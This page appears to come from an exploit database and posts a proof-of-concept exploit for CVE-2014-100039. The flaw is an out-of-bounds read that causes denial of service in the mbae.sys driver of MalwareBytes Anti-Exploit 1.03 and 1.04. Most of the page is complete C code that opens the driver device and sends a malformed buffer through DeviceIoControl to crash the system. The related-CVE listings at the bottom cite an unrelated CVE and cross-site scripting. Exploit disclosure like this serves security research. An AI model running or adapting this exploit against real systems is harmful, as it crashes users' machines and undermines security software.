Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtParvez Anwar1337DAY-ID-23162
HistoryJan 20, 2015 - 12:00 a.m.

MalwareBytes Anti-Exploit 1.03.1.1220, 1.04.1.1012 Out-of-bounds Read DoS Exploit

2015-01-2000:00:00
Parvez Anwar
0day.today
20

EPSS

0.002

Percentile

57.0%

JSON

MalwareBytes Anti-Exploit versions 1.03.1.1220 and 1.04.1.1012 suffer from a denial of service vulnerability.

/*
 
Exploit Title    - MalwareBytes Anti-Exploit Out-of-bounds Read DoS
Date             - 19th January 2015
Discovered by    - Parvez Anwar (@parvezghh)
Vendor Homepage  - https://www.malwarebytes.org
Tested Version   - 1.03.1.1220, 1.04.1.1012
Driver Version   - no version set - mbae.sys
Tested on OS     - 32bit Windows XP SP3 and Windows 7 SP1
OSVDB            - http://www.osvdb.org/show/osvdb/114249
CVE ID           - CVE-2014-100039
Vendor fix url   - https://forums.malwarebytes.org/index.php?/topic/158251-malwarebytes-anti-exploit-hall-of-fame/
Fixed version    - 1.05
Fixed driver ver - no version set
 
*/
 
 
 
#include <stdio.h>
#include <windows.h>
 
#define BUFSIZE 25
 
 
int main(int argc, char *argv[])
{
    HANDLE         hDevice;
    char           devhandle[MAX_PATH];
    DWORD          dwRetBytes = 0;
    BYTE           sizebytes[4] = "\xff\xff\xff\x00";  
    BYTE           *inbuffer;
 
 
    printf("-------------------------------------------------------------------------------\n");
    printf("        MalwareBytes Anti-Exploit (mbae.sys) Out-of-bounds Read DoS            \n");
    printf("             Tested on Windows XP SP3/Windows 7 SP1 (32bit)                    \n");
    printf("-------------------------------------------------------------------------------\n\n");
 
    sprintf(devhandle, "\\\\.\\%s", "ESProtectionDriver");
 
    inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
 
    memset(inbuffer, 0x41, BUFSIZE);
    memcpy(inbuffer, sizebytes, sizeof(sizebytes));
 
    printf("\n[i] Size of total buffer being sent %d bytes", BUFSIZE);
 
    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
     
    if(hDevice == INVALID_HANDLE_VALUE)
    {
        printf("\n[-] Open %s device failed\n\n", devhandle);
        return -1;
    }
    else
    {
        printf("\n[+] Open %s device successful", devhandle);
    }  
 
    printf("\n[~] Press any key to DoS . . .");
    getch();
 
    DeviceIoControl(hDevice, 0x0022e000, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);
 
    printf("\n[+] DoS buffer sent\n\n");
  
    CloseHandle(hDevice);
 
    return 0;
}

#  0day.today [2018-04-14]  #

Related

cvelist 1
prion 1
nvd 1
cve 1
cvelist
cvelist
CVE-2014-10003
2015-01-13 11:00:00
prion
prion
Cross site scripting
2015-01-13 11:59:00
nvd
nvd
CVE-2014-10003
2015-01-13 11:59:12
cve
cve
CVE-2014-10003
2015-01-13 11:59:12

EPSS

0.002

Percentile

57.0%

JSON
Related for 1337DAY-ID-23162
cvelist1prion1nvd1cve1